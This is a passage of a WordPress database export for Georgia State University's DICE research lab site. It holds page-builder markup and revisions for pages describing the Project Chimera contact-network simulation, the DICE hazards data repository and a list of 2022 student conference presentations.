hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 7\",\"attrs\":{\"id\":\"about-7\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c47\",\"parentId\":\"126-c46\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c47\",\"index\":0,\"id\":\"126-c48\",\"partialId\":126,\"styleRef\":876,\"type\":\"content\",\"props\":{\"content\":\"DICE Data Repository\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c47\",\"index\":2,\"id\":\"126-c50\",\"partialId\":126,\"styleRef\":878,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(64, 85, 169);\\\">The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;<\\/span><\\/p>\"}}],\"styleRef\":875,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c51\",\"parentId\":\"126-c46\",\"partialId\":126,\"styleRef\":879,\"type\":\"content\"}],\"id\":\"126-c46\",\"parentId\":\"126-c45\",\"partialId\":126,\"styleRef\":874,\"type\":\"content\"}],\"id\":\"126-c45\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":873,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','publish','closed','closed','','438','','','2023-09-29 11:19:47','2023-09-29 15:19:47','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=438',0,'extb_post_json','',0),(449,1,'2022-02-18 19:35:37','2022-02-18 19:35:37','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"449-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-377 style-local-449-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"449-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-378 style-local-449-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-379-outer style-local-449-c4-outer\">\n            <div data-colibri-id=\"449-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-379 style-local-449-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"449-c5\" class=\"h-text h-text-component style-380 style-local-449-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2022</strong></p>\n                    <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at:\n                      American Association of Geographers, Annual Meeting 2022.</p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Presentations','','publish','closed','closed','','conference-presentations','','','2022-03-17 21:15:02','2022-03-18 01:15:02','',0,'https://gsudice.dataconn.net/?page_id=449',0,'page','',0),(451,1,'2022-02-18 19:35:37','2022-02-18 19:35:37','','Conference Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-02-18 19:35:37','2022-02-18 19:35:37','',449,'https://gsudice.dataconn.net/?p=451',0,'revision','',0),(456,1,'2022-02-18 19:37:11','2022-02-18 19:37:11','','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-02-18 19:37:11','2022-02-18 19:37:11','',449,'https://gsudice.dataconn.net/?p=456',0,'revision','',0),(497,1,'2022-03-17 20:30:37','2022-03-18 00:30:37','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"449-c4\",\"parentId\":\"449-c3\",\"partialId\":449,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"449-c4\",\"index\":0,\"id\":\"449-c5\",\"partialId\":449,\"styleRef\":380,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at: American Association of Geographers, Annual Meeting 2022.<\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p>\"}}],\"styleRef\":379,\"type\":\"content\"}],\"id\":\"449-c3\",\"parentId\":\"449-c2\",\"partialId\":449,\"styleRef\":378,\"type\":\"content\"}],\"id\":\"449-c2\",\"parentId\":\"449-c1\",\"partialId\":449,\"styleRef\":377,\"type\":\"content\"}]}','','','publish','closed','closed','','497','','','2022-03-17 21:15:02','2022-03-18 01:15:02','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=497',0,'extb_post_json','',0),(498,1,'2022-03-17 20:30:37','2022-03-18 00:30:37','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"449-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-369 style-local-449-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"449-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-370 style-local-449-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-371-outer style-local-449-c4-outer\">\n            <div data-colibri-id=\"449-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-371 style-local-449-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"449-c5\" class=\"h-text h-text-component style-372 style-local-449-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>Presentations</strong></p>\n                    <p>\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:30:37','2022-03-18 00:30:37','',449,'https://gsudice.dataconn.net/?p=498',0,'revision','',0),(504,1,'2022-03-17 20:31:17','2022-03-18 00:31:17','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\"}','','','inherit','closed','closed','','497-revision-v1','','','2022-03-17 20:31:17','2022-03-18 00:31:17','',497,'https://gsudice.dataconn.net/?p=504',0,'revision','',0),(505,1,'2022-03-17 20:31:17','2022-03-18 00:31:17','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n  <!---->\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:31:17','2022-03-18 00:31:17','',449,'https://gsudice.dataconn.net/?p=505',0,'revision','',0),(510,1,'2022-03-17 20:34:15','2022-03-18 00:34:15','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n  <!---->\n</div>\n\n<!-- wp:paragraph -->\n<p>2022<a href=\"https://honors.gsu.edu/\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Georgia State Undergraduate Research Conference (GSURC) </p>\n<!-- /wp:paragraph -->','Presentations','','inherit','closed','closed','','449-autosave-v1','','','2022-03-17 20:34:15','2022-03-18 00:34:15','',449,'https://gsudice.dataconn.net/?p=510',0,'revision','',0),(511,1,'2022-03-17 20:34:16','2022-03-18 00:34:16','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n  <!---->\n</div>\n\n<!-- wp:paragraph -->\n<p>2022<a href=\"https://honors.gsu.edu/\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Georgia State Undergraduate Research Conference (GSURC) </p>\n<!-- /wp:paragraph -->','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:34:16','2022-03-18 00:34:16','',449,'https://gsudice.dataconn.net/?p=511',0,'revision','',0),(512,1,'2022-03-17 20:34:59','2022-03-18 00:34:59','<!-- wp:paragraph -->\n<p><a href=\"https://honors.gsu.edu/\"></a></p>\n<!-- /wp:paragraph -->','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:34:59','2022-03-18 00:34:59','',449,'https://gsudice.dataconn.net/?p=512',0,'revision','',0),(514,1,'2022-03-17 20:43:34','2022-03-18 00:43:34','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"449-c8\",\"parentId\":\"449-c7\",\"partialId\":449,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"449-c8\",\"index\":0,\"id\":\"449-c9\",\"partialId\":449,\"styleRef\":380,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p><br><\\/p><p><br><\\/p>\"}}],\"styleRef\":379,\"type\":\"content\"}],\"id\":\"449-c7\",\"parentId\":\"449-c6\",\"partialId\":449,\"styleRef\":378,\"type\":\"content\"}],\"id\":\"449-c6\",\"parentId\":\"449-c1\",\"partialId\":449,\"styleRef\":377,\"type\":\"content\"}]}','','','inherit','closed','closed','','497-revision-v1','','','2022-03-17 20:43:34','2022-03-18 00:43:34','',497,'https://gsudice.dataconn.net/?p=514',0,'revision','',0),(515,1,'2022-03-17 20:43:34','2022-03-18 00:43:34','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"449-c6\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-377 style-local-449-c6 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"449-c7\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-378 style-local-449-c7 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-379-outer style-local-449-c8-outer\">\n            <div data-colibri-id=\"449-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-379 style-local-449-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"449-c9\" class=\"h-text h-text-component style-380 style-local-449-c9 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2022</strong></p>\n                    <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:43:34','2022-03-18 00:43:34','',449,'https://gsudice.dataconn.net/?p=515',0,'revision','',0),(521,1,'2022-03-17 20:51:16','2022-03-18 00:51:16','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"449-c8\",\"parentId\":\"449-c7\",\"partialId\":449,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"449-c8\",\"index\":0,\"id\":\"449-c9\",\"partialId\":449,\"styleRef\":380,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p>\"}}],\"styleRef\":379,\"type\":\"content\"}],\"id\":\"449-c7\",\"parentId\":\"449-c6\",\"partialId\":449,\"styleRef\":378,\"type\":\"content\"}],\"id\":\"449-c6\",\"parentId\":\"449-c1\",\"partialId\":449,\"styleRef\":377,\"type\":\"content\"}]}','','','inherit','closed','closed','','497-revision-v1','','','2022-03-17 20:51:16','2022-03-18 00:51:16','',497,'https://gsudice.dataconn.net/?p=521',0,'revision','',0),(522,1,'2022-03-17 20:51:16','2022-03-18 00:51:16','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"449-c6\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-377 style-local-449-c6 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"449-c7\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-378 style-local-449-c7 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-379-outer style-local-449-c8-outer\">\n            <div data-colibri-id=\"449-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-379 style-local-449-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"449-c9\" class=\"h-text h-text-component style-380 style-local-449-c9 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2022</strong></p>\n                    <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                    <p>\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:51:16','2022-03-18 00:51:16','',449,'https://gsudice.dataconn.net/?p=522',0,'revision','',0),(528,1,'2022-03-17 20:56:13','2022-03-18 00:56:13','','jason-goodman-vbxyFxlgpjM-unsplash','','inherit','open','closed','','jason-goodman-vbxyfxlgpjm-unsplash','','','2022-03-17 20:56:13','2022-03-18 00:56:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/jason-goodman-vbxyFxlgpjM-unsplash.jpg',0,'attachment','image/jpeg',0),(536,1,'2022-03-17 20:59:41','2022-03-18 00:59:41','','andrey-metelev-qpAOxji4dAo-unsplash','','inherit','open','closed','','andrey-metelev-qpaoxji4dao-unsplash','','','2022-03-17 20:59:41','2022-03-18 00:59:41','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/andrey-metelev-qpAOxji4dAo-unsplash.jpg',0,'attachment','image/jpeg',0),(537,1,'2022-03-17 20:59:52','2022-03-18 00:59:52','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-andrey-metelev-qpAOxji4dAo-unsplash-scaled-1.jpg','cropped-andrey-metelev-qpAOxji4dAo-unsplash-scaled-1.jpg','','inherit','open','closed','','cropped-andrey-metelev-qpaoxji4dao-unsplash-scaled-1-jpg','','','2022-03-17 20:59:52','2022-03-18 00:59:52','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-andrey-metelev-qpAOxji4dAo-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(545,1,'2022-03-17 21:06:39','2022-03-18 01:06:39','','colibri-image-103.png','','inherit','open','closed','','colibri-image-103-png','','','2022-03-17 21:06:39','2022-03-18 01:06:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-103.png',0,'attachment','image/png',0),(546,1,'2022-03-17 21:06:42','2022-03-18 01:06:42','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus.&nbsp;<\\/p><p>Phone:&nbsp;(404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c7\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','publish','closed','closed','','546','','','2022-04-08 11:45:31','2022-04-08 15:45:31','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=546',0,'extb_post_json','',0),(547,1,'2022-03-17 21:06:42','2022-03-18 01:06:42','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n            <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                